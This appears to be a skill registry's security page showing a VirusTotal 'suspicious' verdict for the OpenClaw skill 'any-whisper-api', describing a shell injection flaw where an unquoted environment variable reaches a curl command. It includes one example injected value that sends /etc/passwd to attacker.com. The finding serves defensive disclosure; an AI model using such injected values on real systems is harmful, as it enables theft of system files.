Back to skill
Skillv1.3.0
VirusTotal security
ANY WHISPER API · External malware reputation and Code Insight signals for this exact artifact hash.
Scanner verdict
ReviewApr 30, 2026, 4:33 AM
- Hash
- 5803362defbbc5d992d75d43bcffd065c5bdcf60781b9d489fe05c1bb3b0dddc
- Source
- palm
- Verdict
- suspicious
- Code Insight
- Type: OpenClaw Skill Name: any-whisper-api Version: 1.3.0 The `scripts/transcribe.sh` file contains a shell injection vulnerability. The `WHISPER_API_HOST` environment variable is directly interpolated into the `curl` command without proper quoting or sanitization. An attacker who can control this environment variable could inject arbitrary `curl` arguments, potentially leading to data exfiltration (e.g., `WHISPER_API_HOST="attacker.com --data-binary @/etc/passwd"`) or other unauthorized actions.
- External report
- View on VirusTotal